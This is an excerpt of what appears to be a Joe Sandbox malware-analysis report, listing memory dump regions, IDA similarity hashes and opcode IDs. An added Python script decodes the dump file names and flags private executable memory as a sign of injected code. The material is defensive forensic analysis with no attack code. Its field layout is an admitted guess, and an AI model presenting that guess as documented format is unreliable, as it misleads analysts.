                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: __aulldvrm
                                                  • String ID: +$-
                                                  • API String ID: 1302938615-2137968064
                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                  • Instruction ID: 08f32e5b8c90a1fffa7e138c94459950de7194055c05b09df2ac3ccdaa30a06b
                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                  • Instruction Fuzzy Hash: 69919270E0021A9FDF24DF69C881EBEB7A5EF44720F54651AEC55E72E0E730B9418B60
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $$@
                                                  • API String ID: 0-1194432280
                                                  • Opcode ID: 01e297618772ade4b5ed5e917eaa0d6cd1c6dccd7036dc61ffd371714f312605
                                                  • Instruction ID: 67813948330cb832f9e97605dbf5cce172d4a105cfe4bb3446a68d6f4f494e32
                                                  • Opcode Fuzzy Hash: 01e297618772ade4b5ed5e917eaa0d6cd1c6dccd7036dc61ffd371714f312605
                                                  • Instruction Fuzzy Hash: 22810DB1D002699BEB35DB54CD44BEEB7B8AF08714F0051EAA919B7250D7746E84CF60
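The Memory Dump Source entries above all come from the same region, 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, and the IDA snapshot name hcaresult_22_2_42e0000_clip.jbxd repeats its process ID, stage and base address in decimal and short hex. The following decoder is an added example, not Joe Sandbox code: the field layout it assumes (PID, stage, an undecoded dump id, base address, then the Protect, State and Type values of a Windows MEMORY_BASIC_INFORMATION record) is inferred from the values themselves, since 0x40, 0x1000 and 0x20000 are exactly PAGE_EXECUTE_READWRITE, MEM_COMMIT and MEM_PRIVATE. Under that reading the dumped code lives in a committed, private, RWX region that the sandbox still recognises as PE-shaped, which is the footprint of a manually mapped or injected payload rather than a module loaded by the Windows loader.

```python
"""Decode Joe Sandbox .sdmp descriptors and cross-check them against the IDA snapshot name.

Added example, not part of the Joe Sandbox report. The field layout below is an
assumption inferred from the report's own values; the third field (dump id) is
carried through undecoded.
"""
import re
from dataclasses import dataclass

# Windows MEMORY_BASIC_INFORMATION constants (winnt.h).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout: <pid hex>.<stage hex>.<dump id>.<base hex>.<Protect>.<State>.<Type>.<reserved>.sdmp
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9a-f]{8})\.(?P<stage>[0-9a-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<state>[0-9a-f]{8})\."
    r"(?P<mtype>[0-9a-f]{8})\.(?P<reserved>[0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)
# Snapshot names in the report: hcaresult_<pid dec>_<stage dec>_<base hex>_clip.jbxd
SNAPSHOT_RE = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9a-f]+)_clip\.jbxd$", re.IGNORECASE)


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    stage: int
    dump_id: str
    base: int
    protect: int
    state: int
    mtype: int

    @property
    def protect_name(self) -> str:
        # Drop PAGE_GUARD / PAGE_NOCACHE modifier bits before the lookup.
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def state_name(self) -> str:
        return MEM_STATE.get(self.state, f"0x{self.state:x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mtype, f"0x{self.mtype:x}")


def parse_sdmp(name: str) -> DumpRegion:
    """Split an .sdmp file name into its assumed fields; raise on anything else."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name}")
    return DumpRegion(
        pid=int(m["pid"], 16), stage=int(m["stage"], 16), dump_id=m["dump_id"],
        base=int(m["base"], 16), protect=int(m["protect"], 16),
        state=int(m["state"], 16), mtype=int(m["mtype"], 16),
    )


def is_unbacked_executable(r: DumpRegion) -> bool:
    """Committed, executable, private memory: not an image the loader mapped.

    Legitimately loaded modules show up as MEM_IMAGE; a private RWX region that
    the sandbox still treats as PE-based is the usual sign of manually mapped
    or injected code.
    """
    return r.state == 0x1000 and r.mtype == 0x20000 and (r.protect & 0xFF) in EXECUTABLE


def matches_snapshot(r: DumpRegion, snapshot: str) -> bool:
    """True when the IDA snapshot name refers to the same PID, stage and base."""
    m = SNAPSHOT_RE.match(snapshot)
    return bool(m) and (int(m[1]), int(m[2]), int(m[3], 16)) == (r.pid, r.stage, r.base)


if __name__ == "__main__":
    # Descriptor and snapshot name copied from the report entries above.
    region = parse_sdmp(
        "00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp"
    )
    print(f"PID {region.pid} stage {region.stage} base 0x{region.base:X}: "
          f"{region.protect_name} {region.state_name} {region.type_name}")
    print("unbacked executable region:", is_unbacked_executable(region))
    print("matches IDA snapshot:", matches_snapshot(region, "hcaresult_22_2_42e0000_clip.jbxd"))
```

The same check applied to the three Associated dumps (0x4409000, 0x440D000, 0x447E000) flags them identically, since they carry the same Protect, State and Type fields; only the base changes. When triaging a report, the combination of MEM_PRIVATE plus an executable protection plus "based on PE: true" is the line worth pulling into an incident timeline, because it tells you the PE was written into the process rather than loaded from disk.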